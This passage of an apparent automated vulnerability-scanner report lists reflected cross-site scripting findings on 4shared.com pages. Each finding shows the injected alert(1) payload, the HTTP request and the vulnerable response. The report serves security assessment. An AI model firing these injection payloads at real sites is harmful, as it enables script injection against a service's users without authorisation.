Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js99b90'-alert(1)-'5214ff01e8a/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0176E5C9CF5656A92AE2DF47218A078F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:51 GMT
Content-Length: 36195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js99b90'-alert(1)-'5214ff01e8a/signup-script.jsp',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

1.205. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1f89"-alert(1)-"d8bdea6d6a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=37539B6328ADF8C92CE74F121083CDC1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:50 GMT
Content-Length: 36195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsc1f89"-alert(1)-"d8bdea6d6a7/signup-script.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

1.206. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 871d8"-alert(1)-"3e7896575aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/signup-script.jsp871d8"-alert(1)-"3e7896575aa?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp871d8"-alert(1)-"3e7896575aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FA208822AC4E87AC84DD6BBC3E34F4F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/signup-script.jsp871d8"-alert(1)-"3e7896575aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.207. http://static.4shared.com/js/signup-script.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cfb6'-alert(1)-'6d46e9a0364 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/signup-script.jsp8cfb6'-alert(1)-'6d46e9a0364?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/signup-script.jsp8cfb6'-alert(1)-'6d46e9a0364
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A123C854E08F4B4D117563A6F1327D02.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:55 GMT
Content-Length: 36195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
== 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/js/signup-script.jsp8cfb6'-alert(1)-'6d46e9a0364',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.208. http://static.4shared.com/press_room/press_room.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/press_room/press_room.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e14e'-alert(1)-'f8788d687ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press_room1e14e'-alert(1)-'f8788d687ce/press_room.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room1e14e'-alert(1)-'f8788d687ce/press_room.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E38F3DFE8CEE5D84BD699588BB826F8B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:20 GMT
Content-Length: 36209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/press_room1e14e'-alert(1)-'f8788d687ce/press_room.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.209. http://static.4shared.com/press_room/press_room.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/press_room/press_room.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7306f"-alert(1)-"185336a2aa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press_room7306f"-alert(1)-"185336a2aa2/press_room.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room7306f"-alert(1)-"185336a2aa2/press_room.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAB306016A90DE13652BCA754E6DB680.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:19 GMT
Content-Length: 36220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room7306f"-alert(1)-"185336a2aa2/press_room.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.210. http://static.4shared.com/press_room/press_room.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/press_room/press_room.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e703"-alert(1)-"88745b017aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press_room/press_room.css9e703"-alert(1)-"88745b017aa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room/press_room.css9e703"-alert(1)-"88745b017aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA804B0B34E735B008C1BC3E9368AF61.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room/press_room.css9e703"-alert(1)-"88745b017aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.211. http://static.4shared.com/press_room/press_room.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/press_room/press_room.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97f0d'-alert(1)-'4822e3d2a5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press_room/press_room.css97f0d'-alert(1)-'4822e3d2a5a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room/press_room.css97f0d'-alert(1)-'4822e3d2a5a
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D1B987B898B5C7E491A44AF69DF042B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:27 GMT
Content-Length: 36220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/press_room/press_room.css97f0d'-alert(1)-'4822e3d2a5a',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.212. http://static.4shared.com/themes/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/themes/default.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f257'-alert(1)-'9193cb46f3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes5f257'-alert(1)-'9193cb46f3a/default.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes5f257'-alert(1)-'9193cb46f3a/default.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12160EF13B502F6859199EFD6CBB411E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:23 GMT
Content-Length: 36185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/themes5f257'-alert(1)-'9193cb46f3a/default.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

...[SNIP]...

1.213. http://static.4shared.com/themes/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/themes/default.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f1a9"-alert(1)-"b65b614c6be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes7f1a9"-alert(1)-"b65b614c6be/default.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes7f1a9"-alert(1)-"b65b614c6be/default.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=480EF7610CAC6BBB0D085FFC3EAB1570.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:22 GMT
Content-Length: 36174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes7f1a9"-alert(1)-"b65b614c6be/default.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.214. http://static.4shared.com/themes/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/themes/default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a6b"-alert(1)-"5873520bbff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/default.cssd8a6b"-alert(1)-"5873520bbff?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes/default.cssd8a6b"-alert(1)-"5873520bbff
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3A7A8AF385D4FC1A8E0ED110F3EB0BE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:26 GMT
Content-Length: 36185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes/default.cssd8a6b"-alert(1)-"5873520bbff";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.215. http://static.4shared.com/themes/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/themes/default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b2ae'-alert(1)-'7747f5fe227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/default.css6b2ae'-alert(1)-'7747f5fe227?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes/default.css6b2ae'-alert(1)-'7747f5fe227
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=759DC3AD05F2D931D9EAE613596225EC.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:27 GMT
Content-Length: 36185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/themes/default.css6b2ae'-alert(1)-'7747f5fe227',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.216. http://www.4shared.com/advertise/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67425'-alert(1)-'3a9127c3bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise67425'-alert(1)-'3a9127c3bcf/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /advertise67425'-alert(1)-'3a9127c3bcf/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7405DE1451D7B042A9DEA6A27AAC8585.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/advertise67425'-alert(1)-'3a9127c3bcf/',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function en
...[SNIP]...

1.217. http://www.4shared.com/advertise/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf8c"-alert(1)-"fa2cfce21c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertiseadf8c"-alert(1)-"fa2cfce21c6/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /advertiseadf8c"-alert(1)-"fa2cfce21c6/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D569F2525929105DF9E4B5CBCB35FEB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertiseadf8c"-alert(1)-"fa2cfce21c6/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.218. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe69"-alert(1)-"855c7c91d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:20 GMT
Content-Length: 36336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.219. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5290d'-alert(1)-'b61d4324986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertise5290d'-alert(1)-'b61d4324986/banners/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise5290d'-alert(1)-'b61d4324986/banners/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:22 GMT
Content-Length: 36336

